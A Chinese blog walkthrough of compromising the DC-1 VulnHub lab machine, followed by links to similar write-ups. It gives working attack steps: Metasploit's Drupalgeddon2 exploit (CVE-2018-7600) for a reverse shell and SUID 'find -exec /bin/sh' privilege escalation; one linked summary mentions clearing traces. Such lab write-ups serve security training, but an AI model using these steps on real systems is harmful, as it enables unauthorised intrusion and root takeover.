DC-1靶机渗透复现(详细教程)

已于 2023-10-20 18:02:30 修改
阅读量308 收藏 3
点赞数 1
分类专栏: DC系列靶机复现(持续更新中) 文章标签: 安全 网络安全 linux 系统安全 web安全 测试工具
于 2023-10-09 16:14:05 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/hqhhhh/article/details/133697709
版权

DC-1靶机渗透实战

DC系列靶机介绍

DC-1靶机下载

DC-1靶机安装

DC-1靶机环境配置

DC-1靶机渗透开始

①信息收集:

②漏洞发现

③漏洞利用

④SUID提权

⑤溜大街获取flag

DC系列靶机介绍

DC系列是Vulnhub为广大爱好者和网安学习提供的各种漏洞靶场,可以供多种虚拟机下载安装,提供各种有趣的实战。

DC-1靶机下载

https://www.five86.com/downloads/DC-1.zip

DC: 1 ~ VulnHub

DC-1靶机安装

下载完用Vmware打开ova文件即可。

DC-1靶机环境配置

将网络连接模式改成NAT,使其与kali攻击机处于同一局域网

DC-1靶机渗透开始

①信息收集:

首先通过arp-scan -l 命令收集处于同一局域网内的主机IP,推断出DC-1目标靶机的IP是192.168.100.135(注意:每个人靶机的IP不同,请根据自己的网络具体判断),这里的1号主机是自己的物理机,2号是网关,254号是虚拟网卡的DHCP的服务器

nmap -sV 192.168.100.135

扫描常见端口是否打开,以及具体的服务版本号

②漏洞发现

发现有22,80端口开启,尝试访问80端口

发现是用Drupal框架搭建的网站,查看版本

whatweb http://192.168.100.135

发现版本号是Drupal 7尝试去搜索相关的漏洞的exp和poc

找到一个CVE-2018-7600编号的漏洞,我们可以选择用下载的exp和poc去验证;这里我们选择用kali自带的msfconsole来进行攻击,msfconsole已经将这个漏洞的exp和poc集成进去了!

③漏洞利用

利用msf设置攻击脚本目标IP和反弹的shell的主机IP

use exploit/unix/webapp/drupal_drupalgeddon2

出现meterpreter说明成功

shell命令回弹一个对方电脑的shell

④SUID提权

发现是www-data用户,开始提权

 python -c "import pty;pty.spawn('/bin/bash')"  //通过这条命令可以优化界面显示

利用

find  / -perm -u=s 2>/dev/null

这个命令可以查找有什么命令被赋予suid,从而利用其进行提权,这里我们发现了存在find提权

find 文件名  -exec /bin/sh \;

此时已经成功完成提权

⑤溜大街获取flag

在根目录没有发现,进入root家目录发现了最终的flag

用cat命令读取最终的flag

成功夺旗,渗透结束!

hqhhac
关注
  • 1
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
专栏目录
DC-1靶机教程
qq_42553928的博客
04-07 5232
1.明确目标 DC:1 下载地址 https ://download.vulnhub.com/dc/DC-1.zip 2.信息收集 2.1被动信息收集 2.1.1DC:1网页信息收集 https://www.vulnhub.com/entry/dc-1,292/ Description Back to the Top DESCRIPTION DC-1 is a purposely built vulnerable lab for the purpose of gaining experience in
Vulnhub靶机渗透测试 DC-8靶机
12-07
Vulnhub靶机渗透测试 DC-8靶机
靶机DC-1攻略
weixin_43179779的博客
10-07 1128
dc-1靶机靶机攻略
渗透测试】DC-1靶机实战(上)漏洞扫描获取反弹shell
最新发布
m0_74313947的博客
06-04 1209
靶机下载地址靶机界面渗透测试流程:1.范围界定2. 信息搜集3. 目标识别4. 服务枚举5. 漏洞映射6. 社会工程学7. 漏洞利用8. 权限提升9. 访问维护0. 文档报告。
DC系列:1 (DC-1靶机,初级渗透详细教程
jrdh的博客
11-29 7494
DC-1靶机渗透环境搭建详情描述使用工具一:信息收集基础信息查询0x01 查看存活主机0x02 查看开放端口0x03 查看端口服务0x04 扫描网站根目录及指纹信息0x05 访问开放网页二:漏洞发现msf漏洞查询0x01 启动msf0x02 flag10x03 flag20x04 查询数据库信息三:漏洞利用ssh远程连接漏洞0x01 破解密码加密0x02 flag30x03 爆破flag4用户密码0x04 ssh远程连接0x05 flag4四:提权总结 find提权详解 find详解. 环境搭建 详情
DC-1靶机渗透教程以及思路)
菜菜的博客
10-20 2906
一般来说这样的端口,我会先从80端口开始,看是否存在登录页面,是否存在弱口令,是否存在sql注入,dirb遍历目录,查看是否有可疑的目录,使用指纹识别查看cms版本是否存在漏洞。我这里因为靶机出了点问题,连不进去了,一般来说那个网站的密码都会是在库里面,有一个name,还有一个password,用来进行登入网站后台。因为是Linux那么我们接下来输入的命令也得是Linux的,ls查看一下有什么文件,发现有一个flag1.txt,查看。发现开启了4个端口,分别是22,80,111,45186。
DC-1靶机,初级渗透详细教程
2302_79546589的博客
11-24 1295
根据之前的提示看一下配置文件,一般来说配置文件都有一些特别重要的信息在里面,搞不好还能提权,百度Drupal配置文件,路径是Sites/default/settings.php,我们可以用命令直接搜索并打开,内联执行。这个脚本是用php写的,而且还能用php加参数运行,直接得到加密后的密码,这里我们设置一个密码123。密码加密了,像登录就不太好登陆了,我们可以修改一下admin的密码。看到漏洞还是挺多的,我们用等级比较高,也比较新的18年的漏洞。find比较常用,可以执行root权限的命令找查文件,
Vulnhub靶机渗透测试 DC-3靶机
12-07
Vulnhub靶机渗透测试 DC-3靶机
Vulnhub靶机渗透测试 DC-1靶机
03-05
Vulnhub靶机渗透测试 DC-1靶机
Vulnhub靶机渗透测试 DC-7靶机
12-07
Vulnhub靶机渗透测试 DC-7靶机
Vulnhub靶机渗透测试 DC-9靶机
12-07
Vulnhub靶机渗透测试 DC-9靶机
DC系列靶机1通关教程
weixin_58954236的博客
08-04 205
Meterpreter是Metasploit框架中一种强大的后渗透工具,用于在目标系统上执行各种进程控制、信息收集、权限提升和持久化技术等操作。它是一个基于交互式命令行的模块化载荷,可与受感染的目标系统进行远程通信。Meterpreter的功能强大,灵活性高,提供了很多有用的命令和功能,包括:进程控制:可查看、创建、终止和注入进程。文件系统:可以浏览、上传、下载、编辑和删除文件。系统信息:可获取目标主机的详细信息,如操作系统类型、内核版本等。
DC-1靶机渗透测试详细教程
啊醒的博客
05-04 5504
DC靶机系列渗透教程
DC系列】DC-1靶机实战详细讲解
weixin_44681307的博客
06-27 176
Dc-1靶机突破方法
渗透测试学习之靶机DC-1
xdbzdgx的博客
11-05 2767
1.下载安装靶机 下载链接为DC: 1 ~ VulnHub,里面有三种下载方式任选一种即可,下载后解压为.ova文件,该格式可直接在VMware上打开,如果显示打开失败,依照指示重试即可成功,如果仍无法成功可百度、谷歌解决。 在VMware加载成功之后显示如下界面: 默认状态我们是打不开该系统的,也不知道账号密码的,毕竟我们的目的就是在不知道账号密码的情况下拿到root权限,找到flag。 注意,这里建议把DC-1靶机的网络链接模式改为NAT模式。 本文使用的攻击机为kali(安装在VMwa.
《Vulhub-DC-1靶场实战》
weixin_47118413的博客
07-06 2233
DC系列目前总共有9个靶机,本次靶机DC-1 ,下载,靶机中一共有五个flag文件,我们需要找到它们,即完成任务。
DC-1靶场实战详解
热门推荐
a310034188的博客
11-20 1万+
写写自己打DC-1的过程 使用工具 kali DC-1的靶机下载地址为:https://www.vulnhub.com/entry/dc-1,292/ 第一步:环境配置。 我这里的话kali和DC-1都是nat模式 kali IP为:192.168.28.139 DC-1 IP设置为nat模式,具体多少暂时也不知道。 第二步:信息收集 \1. DC-1 IP不知道,那我们首先就先主机存活探测下,看看靶机IP是多少。 为了提高效率,我们直接用nmap,或者arp-scan。 nmap:nmap -sP
靶机2 DC-1(过程超详细
honest_gg的博客
09-09 1459
靶机通过使用msf来getshell,然后进行mysql数据库的查询、更新,最后完成suid提权获取最终的flag
Vulhub-DC-1靶场通关攻略
weixin_51339377的博客
03-16 3594
靶场环境配置: 修改为usb1.0同时新建网络,把网络修改为NAT即可 首先开启靶机环境和kali黑客机器环境 通过NAT模式可以保证两者处于同一个内网环境中 切记 vmware和virtualbox的虚拟网卡可能网段不同 所以要保证kali和靶机在同一个网段 否则无法扫描到相应的靶机 1.第一步 通过kali中自带的一个工具 arp-scan进行内网存活主机探测 arp-scan -l 2.接下来可以借助nmap对目标进行扫描 其中 -sV服务指纹识别 可以探测目标系统...
渗透DC-1靶机设计思路
05-24
设计思路: 1. 确定目标:首先需要确定渗透的目标,即DC-1靶机。 2. 收集信息:收集关于DC-1的信息,如IP地址、开放端口、操作系统等。可以使用工具如nmap、whois、dnsrecon等进行信息搜集。 3. 扫描漏洞:使用漏洞扫描工具如Nessus、OpenVAS等扫描DC-1,寻找漏洞。 4. 渗透攻击:根据扫描结果,利用漏洞进行攻击。可以使用一些常见的攻击手段,如SQL注入、XSS、文件包含、远程代码执行等。 5. 提升权限:在攻击成功后,需要提升自己的权限,获取更高的权限。可以使用一些提权工具,如Metasploit。 6. 横向移动:在获得了足够的权限后,可以尝试横向移动,进一步渗透网络。 7. 维持访问:在渗透成功后,需要维持访问,以便长期监控目标。 8. 清理痕迹:在攻击结束后,需要清理自己留下的痕迹,以免被发现。 以上是一个基本的渗透DC-1靶机的设计思路,但是具体实施过程中需要根据实际情况进行调整和优化。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

hqhhac

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值